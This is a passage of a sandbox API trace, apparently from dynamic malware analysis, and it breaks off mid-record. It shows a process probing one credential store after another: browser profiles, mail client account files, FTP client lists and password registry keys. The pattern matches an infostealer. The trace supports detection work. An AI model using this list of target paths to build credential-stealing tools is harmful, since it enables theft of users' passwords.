[0180.271] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Mozilla\\Firefox\\profiles.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\mozilla\\firefox\\profiles.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0xffffffff [0180.272] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19d5f8) returned 1 [0180.274] CoTaskMemAlloc (cb=0x20c) returned 0x5ced18 [0180.274] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x5ced18 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0180.275] CoTaskMemFree (pv=0x5ced18) [0180.275] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x19eae8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpFilePart=0x0) returned 0x23 [0180.276] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Mailbird\\Store\\Store.db", nBufferLength=0x105, lpBuffer=0x19eb80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Mailbird\\Store\\Store.db", lpFilePart=0x0) returned 0x3b [0180.276] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f028) returned 1 [0180.276] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Mailbird\\Store\\Store.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\mailbird\\store\\store.db"), fInfoLevelId=0x0, lpFileInformation=0x19f0a4 | out: lpFileInformation=0x19f0a4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0180.276] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f024) returned 1 [0180.309] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\DownloadManager\\Passwords", ulOptions=0x0, samDesired=0x20019, phkResult=0x19f048 | out: phkResult=0x19f048*=0x0) returned 0x2 [0180.312] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Thunderbird\\profiles.ini", nBufferLength=0x105, lpBuffer=0x19e9fc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Thunderbird\\profiles.ini", lpFilePart=0x0) returned 0x3e [0180.312] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19ef34) returned 1 [0180.313] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Thunderbird\\profiles.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\thunderbird\\profiles.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0xffffffff [0180.314] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19d5f8) returned 1 [0180.316] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Thunderbird\\profiles.ini", nBufferLength=0x105, lpBuffer=0x19e9fc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Thunderbird\\profiles.ini", lpFilePart=0x0) returned 0x3e [0180.316] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19ef34) returned 1 [0180.316] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Thunderbird\\profiles.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\thunderbird\\profiles.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0xffffffff [0180.317] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19d5f8) returned 1 [0180.320] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\K-Meleon\\profiles.ini", nBufferLength=0x105, lpBuffer=0x19e9fc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\K-Meleon\\profiles.ini", lpFilePart=0x0) returned 0x3b [0180.320] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19ef34) returned 1 [0180.320] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\K-Meleon\\profiles.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\k-meleon\\profiles.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0xffffffff [0180.322] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19d5f8) returned 1 [0180.323] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\K-Meleon\\profiles.ini", nBufferLength=0x105, lpBuffer=0x19e9fc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\K-Meleon\\profiles.ini", lpFilePart=0x0) returned 0x3b [0180.323] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19ef34) returned 1 [0180.324] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\K-Meleon\\profiles.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\k-meleon\\profiles.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0xffffffff [0180.325] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19d5f8) returned 1 [0180.329] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Waterfox\\profiles.ini", nBufferLength=0x105, lpBuffer=0x19e9fc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Waterfox\\profiles.ini", lpFilePart=0x0) returned 0x3b [0180.329] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19ef34) returned 1 [0180.329] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Waterfox\\profiles.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\waterfox\\profiles.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0xffffffff [0180.331] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19d5f8) returned 1 [0180.333] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Waterfox\\profiles.ini", nBufferLength=0x105, lpBuffer=0x19e9fc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Waterfox\\profiles.ini", lpFilePart=0x0) returned 0x3b [0180.333] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19ef34) returned 1 [0180.333] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Waterfox\\profiles.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\waterfox\\profiles.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0xffffffff [0180.334] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19d5f8) returned 1 [0180.367] GetEnvironmentVariableW (in: lpName="appdata", lpBuffer=0x19ef20, nSize=0x80 | out: lpBuffer="") returned 0x25 [0180.369] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\The Bat!", nBufferLength=0x105, lpBuffer=0x19eb34, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\The Bat!", lpFilePart=0x0) returned 0x2e [0180.369] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19efd8) returned 1 [0180.369] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\The Bat!" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\the bat!"), fInfoLevelId=0x0, lpFileInformation=0x19f054 | out: lpFileInformation=0x19f054*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0180.370] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19efd4) returned 1 [0180.437] GetEnvironmentVariableW (in: lpName="appdata", lpBuffer=0x19eefc, nSize=0x80 | out: lpBuffer="") returned 0x25 [0180.438] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Pocomail\\accounts.ini", nBufferLength=0x105, lpBuffer=0x19eb18, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Pocomail\\accounts.ini", lpFilePart=0x0) returned 0x3b [0180.438] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19efc0) returned 1 [0180.439] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Pocomail\\accounts.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\pocomail\\accounts.ini"), fInfoLevelId=0x0, lpFileInformation=0x19f03c | out: lpFileInformation=0x19f03c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0180.439] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19efbc) returned 1 [0180.485] GetEnvironmentVariableW (in: lpName="APPDATA", lpBuffer=0x19ef24, nSize=0x80 | out: lpBuffer="") returned 0x25 [0180.487] GetEnvironmentVariableW (in: lpName="APPDATA", lpBuffer=0x19ef24, nSize=0x80 | out: lpBuffer="") returned 0x25 [0180.508] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\SmartFTP\\Client 2.0\\Favorites\\Quick Connect\\*.xml", nBufferLength=0x105, lpBuffer=0x19eb04, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\SmartFTP\\Client 2.0\\Favorites\\Quick Connect\\*.xml", lpFilePart=0x0) returned 0x57 [0180.508] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\SmartFTP\\Client 2.0\\Favorites\\Quick Connect", nBufferLength=0x105, lpBuffer=0x19eae0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\SmartFTP\\Client 2.0\\Favorites\\Quick Connect", lpFilePart=0x0) returned 0x51 [0180.508] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19eff8) returned 1 [0180.509] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\SmartFTP\\Client 2.0\\Favorites\\Quick Connect", nBufferLength=0x105, lpBuffer=0x19eab8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\SmartFTP\\Client 2.0\\Favorites\\Quick Connect", lpFilePart=0x0) returned 0x51 [0180.511] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\SmartFTP\\Client 2.0\\Favorites\\Quick Connect\\*.xml" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\smartftp\\client 2.0\\favorites\\quick connect\\*.xml"), lpFindFileData=0x19ed20 | out: lpFindFileData=0x19ed20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0180.511] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19efbc) returned 1 [0180.592] SetErrorInfo (dwReserved=0x0, perrinfo=0x4ecb4c) returned 0x0 [0180.593] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\SmartFTP\\Client 2.0\\Favorites\\Quick Connect\\", nBufferLength=0x105, lpBuffer=0x19eb50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\SmartFTP\\Client 2.0\\Favorites\\Quick Connect\\", lpFilePart=0x0) returned 0x52 [0180.624] GetEnvironmentVariableW (in: lpName="SystemDrive", lpBuffer=0x19ef3c, nSize=0x80 | out: lpBuffer="") returned 0x2 [0180.626] GetFullPathNameW (in: lpFileName="C:\\cftp\\Ftplist.txt", nBufferLength=0x105, lpBuffer=0x19eb58, lpFilePart=0x0 | out: lpBuffer="C:\\cftp\\Ftplist.txt", lpFilePart=0x0) returned 0x13 [0180.626] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f000) returned 1 [0180.626] GetFileAttributesExW (in: lpFileName="C:\\cftp\\Ftplist.txt" (normalized: "c:\\cftp\\ftplist.txt"), fInfoLevelId=0x0, lpFileInformation=0x19f07c | out: lpFileInformation=0x19f07c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0180.626] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19effc) returned 1 [0180.632] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Mozilla\\icecat\\profiles.ini", nBufferLength=0x105, lpBuffer=0x19e9fc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Mozilla\\icecat\\profiles.ini", lpFilePart=0x0) returned 0x41 [0180.632] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19ef34) returned 1 [0180.632] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Mozilla\\icecat\\profiles.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\mozilla\\icecat\\profiles.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0xffffffff [0180.634] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19d5f8) returned 1 [0180.637] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Mozilla\\icecat\\profiles.ini", nBufferLength=0x105, lpBuffer=0x19e9fc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Mozilla\\icecat\\profiles.ini", lpFilePart=0x0) returned 0x41 [0180.637] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19ef34) returned 1 [0180.638] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Mozilla\\icecat\\profiles.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\mozilla\\icecat\\profiles.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0xffffffff [0180.640] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19d5f8) returned 1 [0180.749] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Qualcomm\\Eudora\\CommandLine", ulOptions=0x0, samDesired=0x20019, phkResult=0x19f034 | out: phkResult=0x19f034*=0x0) returned 0x2 [0180.795] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Mozilla\\SeaMonkey\\profiles.ini", nBufferLength=0x105, lpBuffer=0x19e9fc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Mozilla\\SeaMonkey\\profiles.ini", lpFilePart=0x0) returned 0x44 [0180.795] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19ef34) returned 1 [0180.795] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Mozilla\\SeaMonkey\\profiles.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\mozilla\\seamonkey\\profiles.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0xffffffff [0180.797] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19d5f8) returned 1 [0180.799] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Mozilla\\SeaMonkey\\profiles.ini", nBufferLength=0x105, lpBuffer=0x19e9fc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Mozilla\\SeaMonkey\\profiles.ini", lpFilePart=0x0) returned 0x44 [0180.799] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19ef34) returned 1 [0180.799] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Mozilla\\SeaMonkey\\profiles.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\mozilla\\seamonkey\\profiles.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0xffffffff [0180.800] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19d5f8) returned 1 [0180.828] CoTaskMemAlloc (cb=0x20c) returned 0x5ced18 [0180.828] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x5ced18 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0180.828] CoTaskMemFree (pv=0x5ced18) [0180.828] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming", nBufferLength=0x105, lpBuffer=0x19eaa8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming", lpFilePart=0x0) returned 0x25 [0180.830] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera Mail\\Opera Mail\\wand.dat", nBufferLength=0x105, lpBuffer=0x19eb40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera Mail\\Opera Mail\\wand.dat", lpFilePart=0x0) returned 0x44 [0180.830] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19efe8) returned 1 [0180.830] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera Mail\\Opera Mail\\wand.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\opera mail\\opera mail\\wand.dat"), fInfoLevelId=0x0, lpFileInformation=0x19f064 | out: lpFileInformation=0x19f064*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0180.830] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19efe4) returned 1 [0180.839] CoTaskMemAlloc (cb=0x20c) returned 0x5ced18 [0180.839] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x5ced18 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0180.839] CoTaskMemFree (pv=0x5ced18) [0180.839] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x19eaac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpFilePart=0x0) returned 0x23 [0180.842] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Tencent\\QQBrowser\\User Data", nBufferLength=0x105, lpBuffer=0x19eb3c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Tencent\\QQBrowser\\User Data", lpFilePart=0x0) returned 0x3f [0180.842] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19efe0) returned 1 [0180.842] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Tencent\\QQBrowser\\User Data" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\tencent\\qqbrowser\\user data"), fInfoLevelId=0x0, lpFileInformation=0x19f05c | out: lpFileInformation=0x19f05c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0180.843] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19efdc) returned 1 [0180.843] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Tencent\\QQBrowser\\User Data\\Default\\EncryptedStorage", nBufferLength=0x105, lpBuffer=0x19eb44, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Tencent\\QQBrowser\\User Data\\Default\\EncryptedStorage", lpFilePart=0x0) returned 0x58 [0180.843] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19efec) returned 1 [0180.843] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Tencent\\QQBrowser\\User Data\\Default\\EncryptedStorage" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\tencent\\qqbrowser\\user data\\default\\encryptedstorage"), fInfoLevelId=0x0, lpFileInformation=0x19f068 | out: lpFileInformation=0x19f068*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0180.843] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19efe8) returned 1 [0180.853] CoTaskMemAlloc (cb=0x20c) returned 0x5ced18 [0180.854] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x5ced18 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0180.854] CoTaskMemFree (pv=0x5ced18) [0180.854] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x19ea80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpFilePart=0x0) returned 0x23 [0180.856] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\falkon\\profiles\\profiles.ini", nBufferLength=0x105, lpBuffer=0x19e9e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\falkon\\profiles\\profiles.ini", lpFilePart=0x0) returned 0x40 [0180.856] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19ef18) returned 1 [0180.856] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\falkon\\profiles\\profiles.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\falkon\\profiles\\profiles.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0xffffffff [0180.858] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19d5d8) returned 1 [0180.909] CoTaskMemAlloc (cb=0x20c) returned 0x5ced18 [0180.909] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x5ced18 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0180.909] CoTaskMemFree (pv=0x5ced18) [0180.909] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming", nBufferLength=0x105, lpBuffer=0x19e9e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming", lpFilePart=0x0) returned 0x25 [0180.911] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Claws-mail", nBufferLength=0x105, lpBuffer=0x19ea78, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Claws-mail", lpFilePart=0x0) returned 0x30 [0180.911] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19ef1c) returned 1 [0180.911] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Claws-mail" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\claws-mail"), fInfoLevelId=0x0, lpFileInformation=0x19ef98 | out: lpFileInformation=0x19ef98*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0180.911] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19ef18) returned 1 [0180.912] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Claws-mail\\clawsrc", nBufferLength=0x105, lpBuffer=0x19ea80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Claws-mail\\clawsrc", lpFilePart=0x0) returned 0x38 [0180.912] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19ef28) returned 1 [0180.913] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Claws-mail\\clawsrc" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\claws-mail\\clawsrc"), fInfoLevelId=0x0, lpFileInformation=0x19efa4 | out: lpFileInformation=0x19efa4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0180.913] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19ef24) returned 1 [0180.928] GetEnvironmentVariableW (in: lpName="Programfiles(x86)", lpBuffer=0x19eeec, nSize=0x80 | out: 